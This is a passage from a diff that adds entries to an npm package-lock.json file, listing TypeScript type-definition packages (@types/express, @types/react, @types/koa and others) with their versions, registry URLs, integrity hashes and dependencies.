"sha512-4Kh9a6B2bQciAhf7FSuMRRkUWecJgJu9nPnx3yzpsfXX/c50REIqpHY4C82bXP90qrLtXtkDxTZosYO3UpOwlA==" + }, + "node_modules/@types/cookiejar": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/@types/cookiejar/-/cookiejar-2.1.2.tgz", + "integrity": "sha512-t73xJJrvdTjXrn4jLS9VSGRbz0nUY3cl2DMGDU48lKl+HR9dbbjW2A9r3g40VA++mQpy6uuHg33gy7du2BKpog==", + "dev": true + }, + "node_modules/@types/cookies": { + "version": "0.7.7", + "resolved": "https://registry.npmjs.org/@types/cookies/-/cookies-0.7.7.tgz", + "integrity": "sha512-h7BcvPUogWbKCzBR2lY4oqaZbO3jXZksexYJVFvkrFeLgbZjQkU4x8pRq6eg2MHXQhY0McQdqmmsxRWlVAHooA==", + "dependencies": { + "@types/connect": "*", + "@types/express": "*", + "@types/keygrip": "*", + "@types/node": "*" + } + }, + "node_modules/@types/cross-spawn": { + "version": "6.0.6", + "resolved": "https://registry.npmjs.org/@types/cross-spawn/-/cross-spawn-6.0.6.tgz", + "integrity": "sha512-fXRhhUkG4H3TQk5dBhQ7m/JDdSNHKwR2BBia62lhwEIq9xGiQKLxd6LymNhn47SjXhsUEPmxi+PKw2OkW4LLjA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/dateformat": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/@types/dateformat/-/dateformat-5.0.2.tgz", + "integrity": "sha512-M95hNBMa/hnwErH+a+VOD/sYgTmo15OTYTM2Hr52/e0OdOuY+Crag+kd3/ioZrhg0WGbl9Sm3hR7UU+MH6rfOw==", + "dev": true + }, + "node_modules/@types/debug": { + "version": "4.1.7", + "resolved": "https://registry.npmjs.org/@types/debug/-/debug-4.1.7.tgz", + "integrity": "sha512-9AonUzyTjXXhEOa0DnqpzZi6VHlqKMswga9EXjpXnnqxwLtdvPPtlO8evrI5D9S6asFRCQ6v+wpiUKbw+vKqyg==", + "dependencies": { + "@types/ms": "*" + } + }, + "node_modules/@types/diff": { + "version": "5.0.9", + "resolved": "https://registry.npmjs.org/@types/diff/-/diff-5.0.9.tgz", + "integrity": "sha512-RWVEhh/zGXpAVF/ZChwNnv7r4rvqzJ7lYNSmZSVTxjV0PBLf6Qu7RNg+SUtkpzxmiNkjCx0Xn2tPp7FIkshJwQ==", + "dev": true + }, + "node_modules/@types/doctrine": { + "version": "0.0.9", + "resolved": "https://registry.npmjs.org/@types/doctrine/-/doctrine-0.0.9.tgz", + "integrity": "sha512-eOIHzCUSH7SMfonMG1LsC2f8vxBFtho6NGBznK41R84YzPuvSBzrhEps33IsQiOW9+VL6NQ9DbjQJznk/S4uRA==", + "dev": true, + "license": "MIT" + }, + "node_modules/@types/eslint": { + "version": "9.6.1", + "resolved": "https://registry.npmjs.org/@types/eslint/-/eslint-9.6.1.tgz", + "integrity": "sha512-FXx2pKgId/WyYo2jXw63kk7/+TY7u7AziEJxJAnSFzHlqTAS3Ync6SvgYAN/k4/PQpnnVuzoMuVnByKK2qp0ag==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/estree": "*", + "@types/json-schema": "*" + } + }, + "node_modules/@types/eslint-scope": { + "version": "3.7.7", + "resolved": "https://registry.npmjs.org/@types/eslint-scope/-/eslint-scope-3.7.7.tgz", + "integrity": "sha512-MzMFlSLBqNF2gcHWO0G1vP/YQyfvrxZ0bF+u7mzUdZ1/xK4A4sru+nraZz5i3iEIk1l1uyicaDVTB4QbbEkAYg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/eslint": "*", + "@types/estree": "*" + } + }, + "node_modules/@types/estree": { + "version": "1.0.6", + "resolved": "https://registry.npmjs.org/@types/estree/-/estree-1.0.6.tgz", + "integrity": "sha512-AYnb1nQyY49te+VRAVgmzfcgjYS91mY5P0TKUDCLEM+gNnA+3T6rWITXRLYCpahpqSQbN5cE+gHpnPyXjHWxcw==", + "dev": true, + "license": "MIT" + }, + "node_modules/@types/events": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/@types/events/-/events-3.0.0.tgz", + "integrity": "sha512-EaObqwIvayI5a8dCzhFrjKzVwKLxjoG9T6Ppd5CEo07LRKfQ8Yokw54r5+Wq7FaBQ+yXRvQAYPrHwya1/UFt9g==", + "dev": true + }, + "node_modules/@types/express": { + "version": "4.17.17", + "resolved": "https://registry.npmjs.org/@types/express/-/express-4.17.17.tgz", + "integrity": "sha512-Q4FmmuLGBG58btUnfS1c1r/NQdlp3DMfGDGig8WhfpA2YRUtEkxAjkZb0yvplJGYdF1fsQ81iMDcH24sSCNC/Q==", + "dependencies": { + "@types/body-parser": "*", + "@types/express-serve-static-core": "^4.17.33", + "@types/qs": "*", + "@types/serve-static": "*" + } + }, + "node_modules/@types/express-serve-static-core": { + "version": "4.17.36", + "resolved": "https://registry.npmjs.org/@types/express-serve-static-core/-/express-serve-static-core-4.17.36.tgz", + "integrity": "sha512-zbivROJ0ZqLAtMzgzIUC4oNqDG9iF0lSsAqpOD9kbs5xcIM3dTiyuHvBc7R8MtWBp3AAWGaovJa+wzWPjLYW7Q==", + "dependencies": { + "@types/node": "*", + "@types/qs": "*", + "@types/range-parser": "*", + "@types/send": "*" + } + }, + "node_modules/@types/glob": { + "version": "8.1.0", + "resolved": "https://registry.npmjs.org/@types/glob/-/glob-8.1.0.tgz", + "integrity": "sha512-IO+MJPVhoqz+28h1qLAcBEH2+xHMK6MTyHJc7MTnnYb6wsoLR29POVGJ7LycmVXIqyy/4/2ShP5sUwTXuOwb/w==", + "dependencies": { + "@types/minimatch": "^5.1.2", + "@types/node": "*" + } + }, + "node_modules/@types/glob-to-regexp": { + "version": "0.4.4", + "resolved": "https://registry.npmjs.org/@types/glob-to-regexp/-/glob-to-regexp-0.4.4.tgz", + "integrity": "sha512-nDKoaKJYbnn1MZxUY0cA1bPmmgZbg0cTq7Rh13d0KWYNOiKbqoR+2d89SnRPszGh7ROzSwZ/GOjZ4jPbmmZ6Eg==", + "dev": true, + "license": "MIT" + }, + "node_modules/@types/hapi__catbox": { + "version": "10.2.4", + "resolved": "https://registry.npmjs.org/@types/hapi__catbox/-/hapi__catbox-10.2.4.tgz", + "integrity": "sha512-A6ivRrXD5glmnJna1UAGw87QNZRp/vdFO9U4GS+WhOMWzHnw+oTGkMvg0g6y1930CbeheGOCm7A1qHsqH7AXqg==" + }, + "node_modules/@types/hapi__hapi": { + "version": "20.0.13", + "resolved": "https://registry.npmjs.org/@types/hapi__hapi/-/hapi__hapi-20.0.13.tgz", + "integrity": "sha512-LP4IPfhIO5ZPVOrJo7H8c8Slc0WYTFAUNQX1U0LBPKyXioXhH5H2TawIgxKujIyOhbwoBbpvOsBf6o5+ToJIrQ==", + "dependencies": { + "@hapi/boom": "^9.0.0", + "@hapi/iron": "^6.0.0", + "@hapi/podium": "^4.1.3", + "@types/hapi__catbox": "*", + "@types/hapi__mimos": "*", + "@types/hapi__shot": "*", + "@types/node": "*", + "joi": "^17.3.0" + } + }, + "node_modules/@types/hapi__mimos": { + "version": "4.1.4", + "resolved": "https://registry.npmjs.org/@types/hapi__mimos/-/hapi__mimos-4.1.4.tgz", + "integrity": "sha512-i9hvJpFYTT/qzB5xKWvDYaSXrIiNqi4ephi+5Lo6+DoQdwqPXQgmVVOZR+s3MBiHoFqsCZCX9TmVWG3HczmTEQ==", + "dependencies": { + "@types/mime-db": "*" + } + }, + "node_modules/@types/hapi__shot": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/@types/hapi__shot/-/hapi__shot-4.1.2.tgz", + "integrity": "sha512-8wWgLVP1TeGqgzZtCdt+F+k15DWQvLG1Yv6ZzPfb3D5WIo5/S+GGKtJBVo2uNEcqabP5Ifc71QnJTDnTmw1axA==", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/hoist-non-react-statics": { + "version": "3.3.1", + "resolved": "https://registry.npmjs.org/@types/hoist-non-react-statics/-/hoist-non-react-statics-3.3.1.tgz", + "integrity": "sha512-iMIqiko6ooLrTh1joXodJK5X9xeEALT1kM5G3ZLhD3hszxBdIEd5C75U834D9mLcINgD4OyZf5uQXjkuYydWvA==", + "dependencies": { + "@types/react": "*", + "hoist-non-react-statics": "^3.3.0" + } + }, + "node_modules/@types/html-minifier-terser": { + "version": "6.1.0", + "resolved": "https://registry.npmjs.org/@types/html-minifier-terser/-/html-minifier-terser-6.1.0.tgz", + "integrity": "sha512-oh/6byDPnL1zeNXFrDXFLyZjkr1MsBG667IM792caf1L2UPOOMf65NFzjUH/ltyfwjAGfs1rsX1eftK0jC/KIg==", + "dev": true + }, + "node_modules/@types/http-assert": { + "version": "1.5.3", + "resolved": "https://registry.npmjs.org/@types/http-assert/-/http-assert-1.5.3.tgz", + "integrity": "sha512-FyAOrDuQmBi8/or3ns4rwPno7/9tJTijVW6aQQjK02+kOQ8zmoNg2XJtAuQhvQcy1ASJq38wirX5//9J1EqoUA==" + }, + "node_modules/@types/http-errors": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/@types/http-errors/-/http-errors-2.0.1.tgz", + "integrity": "sha512-/K3ds8TRAfBvi5vfjuz8y6+GiAYBZ0x4tXv1Av6CWBWn0IlADc+ZX9pMq7oU0fNQPnBwIZl3rmeLp6SBApbxSQ==" + }, + "node_modules/@types/http-proxy": { + "version": "1.17.16", + "resolved": "https://registry.npmjs.org/@types/http-proxy/-/http-proxy-1.17.16.tgz", + "integrity": "sha512-sdWoUajOB1cd0A8cRRQ1cfyWNbmFKLAqBB89Y8x5iYyG/mkJHc0YUH8pdWBy2omi9qtCpiIgGjuwO0dQST2l5w==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/ioredis4": { + "name": "@types/ioredis", + "version": "4.28.10", + "resolved": "https://registry.npmjs.org/@types/ioredis/-/ioredis-4.28.10.tgz", + "integrity": "sha512-69LyhUgrXdgcNDv7ogs1qXZomnfOEnSmrmMFqKgt1XMJxmoOSG/u3wYy13yACIfKuMJ8IhKgHafDO3sx19zVQQ==", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/istanbul-lib-coverage": { + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", + "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", + "dev": true + }, + "node_modules/@types/istanbul-lib-report": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", + "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", + "dev": true, + "dependencies": { + "@types/istanbul-lib-coverage": "*" + } + }, + "node_modules/@types/istanbul-reports": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", + "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", + "dev": true, + "dependencies": { + "@types/istanbul-lib-report": "*" + } + }, + "node_modules/@types/json-schema": { + "version": "7.0.13", + "resolved": "https://registry.npmjs.org/@types/json-schema/-/json-schema-7.0.13.tgz", + "integrity": "sha512-RbSSoHliUbnXj3ny0CNFOoxrIDV6SUGyStHsvDqosw6CkdPV8TtWGlfecuK4ToyMEAql6pzNxgCFKanovUzlgQ==" + }, + "node_modules/@types/json5": { + "version": "0.0.29", + "resolved": "https://registry.npmjs.org/@types/json5/-/json5-0.0.29.tgz", + "integrity": "sha512-dRLjCWHYg4oaA77cxO64oO+7JwCwnIzkZPdrrC71jQmQtlhM556pwKo5bUzqvZndkVbeFLIIi+9TC40JNF5hNQ==", + "dev": true + }, + "node_modules/@types/keygrip": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@types/keygrip/-/keygrip-1.0.2.tgz", + "integrity": "sha512-GJhpTepz2udxGexqos8wgaBx4I/zWIDPh/KOGEwAqtuGDkOUJu5eFvwmdBX4AmB8Odsr+9pHCQqiAqDL/yKMKw==" + }, + "node_modules/@types/koa": { + "version": "2.13.8", + "resolved": "https://registry.npmjs.org/@types/koa/-/koa-2.13.8.tgz", + "integrity": "sha512-Ugmxmgk/yPRW3ptBTh9VjOLwsKWJuGbymo1uGX0qdaqqL18uJiiG1ZoV0rxCOYSaDGhvEp5Ece02Amx0iwaxQQ==", + "dependencies": { + "@types/accepts": "*", + "@types/content-disposition": "*", + "@types/cookies": "*", + "@types/http-assert": "*", + "@types/http-errors": "*", + "@types/keygrip": "*", + "@types/koa-compose": "*", + "@types/node": "*" + } + }, + "node_modules/@types/koa__router": { + "version": "8.0.11", + "resolved": "https://registry.npmjs.org/@types/koa__router/-/koa__router-8.0.11.tgz", + "integrity": "sha512-WXgKWpBsbS14kzmzD9LeFapOIa678h7zvUHxDwXwSx4ETKXhXLVUAToX6jZ/U7EihM7qwyD9W/BZvB0MRu7MTQ==", + "dependencies": { + "@types/koa": "*" + } + }, + "node_modules/@types/koa-compose": { + "version": "3.2.5", + "resolved": "https://registry.npmjs.org/@types/koa-compose/-/koa-compose-3.2.5.tgz", + "integrity": "sha512-B8nG/OoE1ORZqCkBVsup/AKcvjdgoHnfi4pZMn5UwAPCbhk/96xyv284eBYW8JlQbQ7zDmnpFr68I/40mFoIBQ==", + "dependencies": { + "@types/koa": "*" + } + }, + "node_modules/@types/ldapjs": { + "version": "1.0.11", + "resolved": "https://registry.npmjs.org/@types/ldapjs/-/ldapjs-1.0.11.tgz", + "integrity": "sha512-O4D1frY6xy2mQr5WouNPeltMe5EHdmU4FxbLDC6TMDX5HXOuafusGu+7Y9WAoqBaYHZ5hcFa7jfkpggyexfeXQ==", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/linkify-it": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/@types/linkify-it/-/linkify-it-5.0.0.tgz", + "integrity": "sha512-sVDA58zAw4eWAffKOaQH5/5j3XeayukzDk+ewSsnv3p4yJEZHCCzMDiZM8e0OUrRvmpGZ85jf4yDHkHsgBNr9Q==" + }, + "node_modules/@types/lodash": { + "version": "4.14.178", + "resolved": "https://registry.npmjs.org/@types/lodash/-/lodash-4.14.178.tgz", + "integrity": "sha512-0d5Wd09ItQWH1qFbEyQ7oTQ3GZrMfth5JkbN3EvTKLXcHLRDSXeLnlvlOn0wvxVIwK5o2M8JzP/OWz7T3NRsbw==", + "dev": true + }, + "node_modules/@types/long": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/@types/long/-/long-4.0.1.tgz", + "integrity": "sha512-5tXH6Bx/kNGd3MgffdmP4dy2Z+G4eaXw0SE81Tq3BNadtnMR5/ySMzX4SLEzHJzSmPNn4HIdpQsBvXMUykr58w==" + }, + "node_modules/@types/markdown-it": { + "version": "14.1.1", + "resolved": "https://registry.npmjs.org/@types/markdown-it/-/markdown-it-14.1.1.tgz", + "integrity": "sha512-4NpsnpYl2Gt1ljyBGrKMxFYAYvpqbnnkgP/i/g+NLpjEUa3obn1XJCur9YbEXKDAkaXqsR1LbDnGEJ0MmKFxfg==", + "dependencies": { + "@types/linkify-it": "^5", + "@types/mdurl": "^2" + } + }, + "node_modules/@types/mdurl": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/@types/mdurl/-/mdurl-2.0.0.tgz", + "integrity": "sha512-RGdgjQUZba5p6QEFAVx2OGb8rQDL/cPRG7GiedRzMcJ1tYnUANBncjbSB1NRGwbvjcPeikRABz2nshyPk1bhWg==" + }, + "node_modules/@types/mdx": { + "version": "2.0.13", + "resolved": "https://registry.npmjs.org/@types/mdx/-/mdx-2.0.13.tgz", + "integrity": "sha512-+OWZQfAYyio6YkJb3HLxDrvnx6SWWDbC0zVPfBRzUk0/nqoDyf6dNxQi3eArPe8rJ473nobTMQ/8Zk+LxJ+Yuw==", + "dev": true, + "license": "MIT" + }, + "node_modules/@types/memcached": { + "version": "2.2.7", + "resolved": "https://registry.npmjs.org/@types/memcached/-/memcached-2.2.7.tgz", + "integrity": "sha512-ImJbz1i8pl+OnyhYdIDnHe8jAuM8TOwM/7VsciqhYX3IL0jPPUToAtVxklfcWFGYckahEYZxhd9FS0z3MM1dpA==", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/mime": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/@types/mime/-/mime-1.3.2.tgz", + "integrity": "sha512-YATxVxgRqNH6nHEIsvg6k2Boc1JHI9ZbH5iWFFv/MTkchz3b1ieGDa5T0a9RznNdI0KhVbdbWSN+KWWrQZRxTw==" + }, + "node_modules/@types/mime-db": { + "version": "1.43.1", + "resolved": "https://registry.npmjs.org/@types/mime-db/-/mime-db-1.43.1.tgz", + "integrity": "sha512-kGZJY+R+WnR5Rk+RPHUMERtb2qBRViIHCBdtUrY+NmwuGb8pQdfTqQiCKPrxpdoycl8KWm2DLdkpoSdt479XoQ==" + }, + "node_modules/@types/minimatch": { + "version": "5.1.2", + "resolved": "https://registry.npmjs.org/@types/minimatch/-/minimatch-5.1.2.tgz", + "integrity": "sha512-K0VQKziLUWkVKiRVrx4a40iPaxTUefQmjtkQofBkYRcoaaL/8rhwDWww9qWbrgicNOgnpIsMxyNIUM4+n6dUIA==" + }, + "node_modules/@types/mocha": { + "version": "10.0.6", + "resolved": "https://registry.npmjs.org/@types/mocha/-/mocha-10.0.6.tgz", + "integrity": "sha512-dJvrYWxP/UcXm36Qn36fxhUKu8A/xMRXVT2cliFF1Z7UA9liG5Psj3ezNSZw+5puH2czDXRLcXQxf8JbJt0ejg==", + "dev": true + }, + "node_modules/@types/mocha-each": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/@types/mocha-each/-/mocha-each-2.0.0.tgz", + "integrity": "sha512-wZWPqB+pnH9SL7qzORZha1dBt5ypYgPYDSma9wwtQVGmu36QonRWnc8hbJwgMaCPYHTHzrAGMnwp+we/SGI2YQ==", + "dev": true, + "dependencies": { + "@types/mocha": "*" + } + }, + "node_modules/@types/ms": { + "version": "0.7.31", + "resolved": "https://registry.npmjs.org/@types/ms/-/ms-0.7.31.tgz", + "integrity": "sha512-iiUgKzV9AuaEkZqkOLDIvlQiL6ltuZd9tGcW3gwpnX8JbuiuhFlEGmmFXEXkN50Cvq7Os88IY2v0dkDqXYWVgA==" + }, + "node_modules/@types/mysql": { + "version": "2.15.21", + "resolved": "https://registry.npmjs.org/@types/mysql/-/mysql-2.15.21.tgz", + "integrity": "sha512-NPotx5CVful7yB+qZbWtXL2fA4e7aEHkihHLjklc6ID8aq7bhguHgeIoC1EmSNTAuCgI6ZXrjt2ZSaXnYX0EUg==", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/node": { + "version": "18.18.3", + "resolved": "https://registry.npmjs.org/@types/node/-/node-18.18.3.tgz", + "integrity": "sha512-0OVfGupTl3NBFr8+iXpfZ8NR7jfFO+P1Q+IO/q0wbo02wYkP5gy36phojeYWpLQ6WAMjl+VfmqUk2YbUfp0irA==" + }, + "node_modules/@types/node-fetch": { + "version": "2.6.11", + "resolved": "https://registry.npmjs.org/@types/node-fetch/-/node-fetch-2.6.11.tgz", + "integrity": "sha512-24xFj9R5+rfQJLRyM56qh+wnVSYhyXC2tkoBndtY0U+vubqNsYXGjufB2nn8Q6gt0LrARwL6UBtMCSVCwl4B1g==", + "dependencies": { + "@types/node": "*", + "form-data": "^4.0.0" + } + }, + "node_modules/@types/node-forge": { + "version": "1.3.11", + "resolved": "https://registry.npmjs.org/@types/node-forge/-/node-forge-1.3.11.tgz", + "integrity": "sha512-FQx220y22OKNTqaByeBGqHWYz4cl94tpcxeFdvBo3wjG6XPBuZ0BNgNZRV5J5TFmmcsJ4IzsLkmGRiQbnYsBEQ==", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/normalize-package-data": { + "version": "2.4.4", + "resolved": "https://registry.npmjs.org/@types/normalize-package-data/-/normalize-package-data-2.4.4.tgz", + "integrity": "sha512-37i+OaWTh9qeK4LSHPsyRC7NahnGotNuZvjLSgcPzblpHB3rrCJxAOgI5gCdKm7coonsaX1Of0ILiTcnZjbfxA==", + "dev": true + }, + "node_modules/@types/parse-json": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/@types/parse-json/-/parse-json-4.0.0.tgz", + "integrity": "sha512-//oorEZjL6sbPcKUaCdIGlIUeH26mgzimjBB77G6XRgnDl/L5wOnpyBGRe/Mmf5CVW3PwEBE1NjiMZ/ssFh4wA==", + "dev": true + }, + "node_modules/@types/passport": { + "version": "1.0.15", + "resolved": "https://registry.npmjs.org/@types/passport/-/passport-1.0.15.tgz", + "integrity": "sha512-oHOgzPBp5eLI1U/7421qYV/ZySQXMYCBSfRkDe1tQ0YrIbLY/M/76qIXE7Bs7lFyvw1x5QqiNQ9imvh0fQHe9Q==", + "dependencies": { + "@types/express": "*" + } + }, + "node_modules/@types/passport-strategy": { + "version": "0.2.38", + "resolved": "https://registry.npmjs.org/@types/passport-strategy/-/passport-strategy-0.2.38.tgz", + "integrity": "sha512-GC6eMqqojOooq993Tmnmp7AUTbbQSgilyvpCYQjT+H6JfG/g6RGc7nXEniZlp0zyKJ0WUdOiZWLBZft9Yug1uA==", + "dependencies": { + "@types/express": "*", + "@types/passport": "*" + } + }, + "node_modules/@types/path-browserify": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@types/path-browserify/-/path-browserify-1.0.2.tgz", + "integrity": "sha512-ZkC5IUqqIFPXx3ASTTybTzmQdwHwe2C0u3eL75ldQ6T9E9IWFJodn6hIfbZGab73DfyiHN4Xw15gNxUq2FbvBA==", + "dev": true + }, + "node_modules/@types/pdf-parse": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/@types/pdf-parse/-/pdf-parse-1.1.4.tgz", + "integrity": "sha512-+gbBHbNCVGGYw1S9lAIIvrHW47UYOhMIFUsJcMkMrzy1Jf0vulBN3XQIjPgnoOXveMuHnF3b57fXROnY/Or7eg==", + "dev": true, + "license": "MIT" + }, + "node_modules/@types/pg": { + "version": "8.6.1", + "resolved": "https://registry.npmjs.org/@types/pg/-/pg-8.6.1.tgz", + "integrity": "sha512-1Kc4oAGzAl7uqUStZCDvaLFqZrW9qWSjXOmBfdgyBP5La7Us6Mg4GBvRlSoaZMhQF/zSj1C8CtKMBkoiT8eL8w==", + "dependencies": { + "@types/node": "*", + "pg-protocol": "*", + "pg-types": "^2.2.0" + } + }, + "node_modules/@types/pg-pool": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/@types/pg-pool/-/pg-pool-2.0.3.tgz", + "integrity": "sha512-fwK5WtG42Yb5RxAwxm3Cc2dJ39FlgcaNiXKvtTLAwtCn642X7dgel+w1+cLWwpSOFImR3YjsZtbkfjxbHtFAeg==", + "dependencies": { + "@types/pg": "*" + } + }, + "node_modules/@types/prop-types": { + "version": "15.7.4", + "resolved": "https://registry.npmjs.org/@types/prop-types/-/prop-types-15.7.4.tgz", + "integrity": "sha512-rZ5drC/jWjrArrS8BR6SIr4cWpW09RNTYt9AMZo3Jwwif+iacXAqgVjm0B0Bv/S1jhDXKHqRVNCbACkJ89RAnQ==" + }, + "node_modules/@types/qs": { + "version": "6.9.7", + "resolved": "https://registry.npmjs.org/@types/qs/-/qs-6.9.7.tgz", + "integrity": "sha512-FGa1F62FT09qcrueBA6qYTrJPVDzah9a+493+o2PCXsesWHIn27G98TsSMs3WPNbZIEj4+VJf6saSFpvD+3Zsw==" + }, + "node_modules/@types/range-parser": { + "version": "1.2.4", + "resolved": "https://registry.npmjs.org/@types/range-parser/-/range-parser-1.2.4.tgz", + "integrity": "sha512-EEhsLsD6UsDM1yFhAvy0Cjr6VwmpMWqFBCb9w07wVugF7w9nfajxLuVmngTIpgS6svCnm6Vaw+MZhoDCKnOfsw==" + }, + "node_modules/@types/react": { + "version": "17.0.40", + "resolved": "https://registry.npmjs.org/@types/react/-/react-17.0.40.tgz", + "integrity": "sha512-UrXhD/JyLH+W70nNSufXqMZNuUD2cXHu6UjCllC6pmOQgBX4SGXOH8fjRka0O0Ee0HrFxapDD8Bwn81Kmiz6jQ==", + "dependencies": { + "@types/prop-types": "*", + "@types/scheduler": "*", + "csstype": "^3.0.2" + } + }, + "node_modules/@types/react-bootstrap": { + "version": "0.32.36", + "resolved": "https://registry.npmjs.org/@types/react-bootstrap/-/react-bootstrap-0.32.36.tgz", + "integrity": "sha512-xldfs2zixagAFEafy/XzRvZH1NtjRnLfbgL0cZ2a0Eykz+iILE/Xa46tnUFcLln6ZBq1Qp9uArhIbkkuhBU30g==", + "dev": true, + "dependencies": { + "@types/react": "*" + } + }, + "node_modules/@types/react-color": { + "version": "3.0.6", + "resolved": "https://registry.npmjs.org/@types/react-color/-/react-color-3.0.6.tgz", + "integrity": "sha512-OzPIO5AyRmLA7PlOyISlgabpYUa3En74LP8mTMa0veCA719SvYQov4WLMsHvCgXP+L+KI9yGhYnqZafVGG0P4w==", + "dev": true, + "dependencies": { + "@types/react": "*", + "@types/reactcss": "*" + } + }, + "node_modules/@types/react-dom": { + "version": "17.0.13", + "resolved": "https://registry.npmjs.org/@types/react-dom/-/react-dom-17.0.13.tgz", + "integrity": "sha512-wEP+B8hzvy6ORDv1QBhcQia4j6ea4SFIBttHYpXKPFZRviBvknq0FRh3VrIxeXUmsPkwuXVZrVGG7KUVONmXCQ==", + "dev": true, + "dependencies": { + "@types/react": "*" + } + }, + "node_modules/@types/react-google-recaptcha": { + "version": "2.1.5", + "resolved": "https://registry.npmjs.org/@types/react-google-recaptcha/-/react-google-recaptcha-2.1.5.tgz", + "integrity": "sha512-iWTjmVttlNgp0teyh7eBXqNOQzVq2RWNiFROWjraOptRnb1OcHJehQnji0sjqIRAk9K0z8stjyhU+OLpPb0N6w==", + "dev": true, + "dependencies": { + "@types/react": "*" + } + }, + "node_modules/@types/react-linkify": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/@types/react-linkify/-/react-linkify-1.0.0.tgz", + "integrity": "sha512-2NKXPQGaHNfh/dCqkVC55k1tAhQyNoNZa31J50nIneMVwHqUI00FAP+Lyp8e0BarPf84kn4GRVAhtWX9XJBzSQ==", + "dev": true, + "dependencies": { + "@types/react": "*" + } + }, + "node_modules/@types/react-redux": { + "version": "7.1.33", + "resolved": "https://registry.npmjs.org/@types/react-redux/-/react-redux-7.1.33.tgz", + "integrity": "sha512-NF8m5AjWCkert+fosDsN3hAlHzpjSiXlVy9EgQEmLoBhaNXbmyeGs/aj5dQzKuF+/q+S7JQagorGDW8pJ28Hmg==", + "dependencies": { + "@types/hoist-non-react-statics": "^3.3.0", + "@types/react": "*", + "hoist-non-react-statics": "^3.3.0", + "redux": "^4.0.0" + } + }, + "node_modules/@types/react-transition-group": { + "version": "4.4.10", + "resolved": "https://registry.npmjs.org/@types/react-transition-group/-/react-transition-group-4.4.10.tgz", + "integrity": "sha512-hT/+s0VQs2ojCX823m60m5f0sL5idt9SO6Tj6Dg+rdphGPIeJbJ6CxvBYkgkGKrYeDjvIpKTR38UzmtHJOGW3Q==", + "dev": true, + "dependencies": { + "@types/react": "*" + } + }, + "node_modules/@types/reactcss": { + "version": "1.2.6", + "resolved": "https://registry.npmjs.org/@types/reactcss/-/reactcss-1.2.6.tgz", + "integrity": "sha512-qaIzpCuXNWomGR1Xq8SCFTtF4v8V27Y6f+b9+bzHiv087MylI/nTCqqdChNeWS7tslgROmYB7yeiruWX7WnqNg==", + "dev": true, + "dependencies": { + "@types/react": "*" + } + }, + "node_modules/@types/recurly__recurly-js": { + "version": "4.22.0", + "resolved": "https://registry.npmjs.org/@types/recurly__recurly-js/-/recurly__recurly-js-4.22.0.tgz", + "integrity": "sha512-2dJ1QnwcyCmxeIAzOaBx/r1JqMIqZ7rohxJMY0UynSQidEDfb9X2x3OHMthBXDtTzSFJ1usY934wakxgm7d+Wg==", + "dev": true + }, + "node_modules/@types/request": { + "version": "2.48.12", + "resolved": "https://registry.npmjs.org/@types/request/-/request-2.48.12.tgz", + "integrity": "sha512-G3sY+NpsA9jnwm0ixhAFQSJ3Q9JkpLZpJbI3GMv0mIAT0y3mRabYeINzal5WOChIiaTEGQYlHOKgkaM9EisWHw==", + "dependencies": { + "@types/caseless": "*", + "@types/node": "*", + "@types/tough-cookie": "*", + "form-data": "^2.5.0" + } + }, + "node_modules/@types/request/node_modules/form-data": { + "version": "2.5.1", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.5.1.tgz", + "integrity": "sha512-m21N3WOmEEURgk6B9GLOE4RuWOFf28Lhh9qGYeNlGq4VDXUlJy2th2slBNU8Gp8EzloYZOibZJ7t5ecIrFSjVA==", + "dependencies": { + "asynckit": "^0.4.0", + "combined-stream": "^1.0.6", + "mime-types": "^2.1.12" + }, + "engines": { + "node": ">= 0.12" + } + }, + "node_modules/@types/resolve": { + "version": "1.20.6", + "resolved": "https://registry.npmjs.org/@types/resolve/-/resolve-1.20.6.tgz", + "integrity": "sha512-A4STmOXPhMUtHH+S6ymgE2GiBSMqf4oTvcQZMcHzokuTLVYzXTB8ttjcgxOVaAp2lGwEdzZ0J+cRbbeevQj1UQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/@types/retry": { + "version": "0.12.2", + "resolved": "https://registry.npmjs.org/@types/retry/-/retry-0.12.2.tgz", + "integrity": 